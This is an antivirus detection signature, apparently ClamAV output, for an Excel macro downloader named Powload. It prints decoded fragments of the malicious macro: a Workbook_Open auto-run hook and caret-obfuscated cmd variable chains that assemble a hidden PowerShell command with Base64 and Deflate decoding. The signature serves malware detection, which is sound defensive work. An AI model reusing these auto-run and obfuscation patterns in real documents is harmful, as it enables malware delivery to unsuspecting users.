VIRUS NAME: Xls.Downloader.Powload-6923120-0
TDB: Engine:51-255,Target:2
LOGICAL EXPRESSION: 0&1&2&3&4&5&6&7
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Function torro()
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Function tremors()
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Sub Workbook_Open()
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
omran = tremors + "^remtR5^Aix)&&  (^s^e^t c^WSV=^A^rm^U)&&  (Se^T  ^ ^BW7=^XV)&(  ,, , ,,  (^SEt  ^ C^ij=^vQN)  ,  ,,  )& (Set q^X=^i^I^))&&( ,  (^set  ^ 8^i47=^ ^{`$_),  ,,  )&&(^s^Et  ^ ^c^wH=^kqa02Wx^1/v^fFwy52+7z^fe^+)&&  (^SEt ^q0^C^c=^9)&&  (SE^T ^  ^OZ=.Co^MpR^ES)&(  , ,  , ,, (s^E^T ^ ^ ^U19=e^a) , , )&(  , (set   ^8R=O) , )&&(  ,(SE^T ^  ^xm=^h) )&&  (  , (^s^e^t v^F=^s  ^h^i^dDe),  )& (S^e^t  ^ep3A=^Q^OyR2U^JM)&(, ,, ,,(Se^T G1^yS=^4^oTe1Nn) , )&( (s^Et ^ r^Y=uqSZ^q^t^H7Njw) , )&( ,  ,  ,(S^E^T ^a^z8=N.^D^efLa^tesTR) ,  )&  (^SET  ^ b^1=^M^()&&  (s^eT ^ D^RKS=FI^l^E^  -NoL^ogO  )&&  (^s^eT q^G=.^I)&& (^S^ET ^Rw=2ZZ^2)&&  (S^Et G^Y=CA^C0g^IO)& ( (S^ET ^ e5^S=^`^$P^S^HO^ME[30]+'x'^)""""^\"""" ),  ,  ,  )& (^se^t b^aCI=4k^Bwy)&&  (,, , (sE^T ^  ^LK=f^R^o^m^ba), )&&(sE^t   ^lPo=^([C^hAr]44^).T^oSTRIng)&& (,  (s^Et Op^1=4)  ,  )&&(se"
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
serena = "&(, (s^eT JG^A=T^]::), )&&(se^T  ^ L^b=ho^M^E[34]+)&&  ^sEt   p^VZ=""""&(,  (^seT ^ ^6vzH=a) , )&(  ,  (S^eT ^u5=^E3Kyvr^/E) ,)&&(  ,(^seT  ^rp=^iN^G]::^aS^C),  ,  ,  )&  ( ,(Set  m^Lwq=U^5^EyC^8^='^)""""\"""" + ),  , , )&&  (S^ET ^  ^bn=^)^  ^+ """"\""""^[^IO)&( ,(S^eT ^ c^LM=M9^ArXoE^w),)& (Se^T  ^ G^U=^^^|^ )&&  (S^et ^ b^HT=[)&(  , (s^Et c2^Q=.rE^ad^Toen^d^(^) }^))  ,,  ,)&( ,(se^t  ^i8T3=^(),)&&  (sE^T ^0zSA=B0/^W^9pYXW^t^tmz3U^fr^So^a)&&( , , ,  (sE^t ^  Eh=Z^ttA),  ,,  ,, )&  (^S^eT ^ ^ ^VDG=N^M)&(, (Se^T  ^ D^vI=ES^sI^o) )&& ( (Se^t O^c^W^L= ^^^&^(^ ^`$),)&& (, , ,  , ,(SE^T  3^y=I^hv)  , )&(^Set q^Xu=3^D^J^dlB6l^MtdrCqa^KOl0P)& (, ,,,,(^se^T ^ ^ ^Zb='^X) , , )&&  , ca^LL ,, SeT   q4j=%r^M%%B^9s%%7z%%s^O%%c^g%%^rj^UN%%sZ^G%%^Vp^05%%^8R%%D^RKS%%^Eh^p%%gx^b%%^6vzH%%^Rz%%9c^u^B%%^G5Q1%%v^F%%uU^H%%v^Z^c%%a^Xch%%P^d^J6%%L^b%%^Zb%%^R5qC%%^Z13%%j1%%x^S%%eZ^P%%^a^z8%%^U19%%b^1%%^AN%%Sq^5^s%%JG^A%%^LK%%UQ7^k%%^J^F^O6%%bv%%us6%%^c^wH%%c^WSV%%C^d^J%%G^Y%%^q0^C^c%%^e"
 * SUBSIG ID 5
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
tess = "^e1hjBC^Xsd1^fexS2i)&& (  ,(s^ET  ^ ^rj^UN=ni)  , )& ( (SE^t  ^H8^O=^QBL^9tiq^E^M^8^utN)  ,,  ,  )&  (,(s^et bC^0=h^K)  ,)&&  (  , , ,,  ,  (s^ET ^cI=^(^ ^`$^_""""\"""" ) ,  )&& (,  ,, (^S^et  ^ID=^21^]+),  )&&(^sET  ^ ^Dq4G=l^Ay^v^Y8Gg6lQqsD^4Yq^Rj^O)&&  (  , (^SEt ^  Ea^u=S) ,  )&(  ,(^s^Et ^Z^HTE=0^f),  , ,  ,  ,  )&(^S^eT ^cN^Vz=^L1)&  (^se^t ^oP8=p)& (  ,(^SeT  ^ UQ7^k=^s^e64sTrIN),  )&&  (,  , , ,  , (SE^T  ^ ^7^2=^cP^V)  ,  , ,  , ,)& (^SE^T ^cOyd=^RIng^(^) ^ )&  (Se^T ^ X^j=+^ )&&(  ,(S^eT ^Eh^p=^-ExEC^Ut ) ,  )&  ( ,(^S^et  ^h^g=+ """"\""""[^sys^t^E^M^.^t),  )&  (  , (s^E^t ^ I1=W^A^Hn^u0^avhW^w^4c38X6)  ,,, , ,)&  (^seT ^ ^R5qC=^'^)^()& (,  (SEt 3^C^he=^^^|) ,)&&(s^eT ^ HJ^VR=^ee57)&&  (,  (se^t  ^ ^olr8=^})  ,  )& (,(S^Et ^I^r=^ON^.COmPR),)& (S^et ^3R^Y=^(^[ChA^r]44^))&(S^et cni^h=^E)&&(^s^eT 0^A=c^t  S^Y^s^T^EM)&& (, (^Set  ^ J^V^w=^od^E)  ,  )&(^s^ET g^I=p^b^RXN^T^S)&&  (^Set ^ us6=+00^z)& ( , , ,  (s^Et ^ C^d^J=A^p) ,)&& (SE^T bI^He=.T^oS^T)"
 * SUBSIG ID 6
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
tremors = Replace("$c$md$ /$c C%P$rOGR$aM$FI$l$ES:~ $ -7,1%$D,  , /V$:$O$$n ,$,/$%aP$" + "P$d" + "A$ta:~-7$,1% "" , (S$e^T$ j1=^E$w-ob$je^$$ct $I^o$$.c^$$OM$$p)&  (^s$ET$ ^ ^J^F$^O6=G^('VZ$Bba8^IwGI$b/^Sp$A^O^E", "$", "")
 * SUBSIG ID 7
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
vicking = "  (^sEt 3^M^K^1=obj^ECt{nE^w^-o^bj^e), )&  (se^T g^BQ=s^i)& (^seT ^  ^aMG=^u)&  ( , ,, (^sE^T ^ ^aw^yI=^l) ,  )&(  ,  (Se^t ^ ^ir^1^V=^h) )& (, , ,(S^Et  uU^H=n^ ^   ^^^&^ ^(^ ),  )&& (  , (S^Et  o^JV=^^^|^ fOR),)&&  (^S^e^t v^Z^c=$^p^S)&& (s^et  ^ ^g^Vkp=^6)& (  , (SE^T  ^CY=^4)  ,  )&&  (S^et 9c^u^B=^ )&&  (se^t ^ ^Rz=^SS )&&  (s^et ^  z^R=^G4G^u^tW)&&(  ,  (se^T ^  gx^b=b^Yp)  ,)& (  , (SE^t ^ ^a^g=z^P), )&&(, ,  ,  , , (S^eT sZ^G=Nt^Er^ac  ^-),  )&  (  ,  (^sEt l^V^p=^OmPre^S^s^ ^)^ )  ,)&  ( ,(^S^ET  x^dNR=bg8^r^j), )&(,(s^E^T ^ l^R=^Ext^.eNcO)  ,)&& (se^T  ^ c^g=W^e^r^SH^e^ll^ -N^O)&&  (^s^ET ^ OE^9^Q=DS^hyxy^yV2Apb^uy)&& ( (sET ^  Sq^5^s=Mo^RY^S^T^" + "RE^a^m] ^[C^O" + "n^vER),  )&&  ( , (s^ET x^S=^re^ss^i),  )& (S^eT p^v=^) """")&& (  ,  , ,  , ,(Se^t  ^ I^G4^Q=^CT), )&&( ,  (S^ET ^  B^9s=^exe  pR) ,)&  (, (sE^T ^s^Hnp=0M^y),  ,  ,  )&& (, (sE^T  ^ ^Je=^m8)  ,  )&  (Se^t ^  bv=fa^qfNGZQobl^CJ^p)&&( ,  (se^T ^  q8=^v^v)  , )&& (Se^T  ^ ^S^l=Q^VH^cO8"
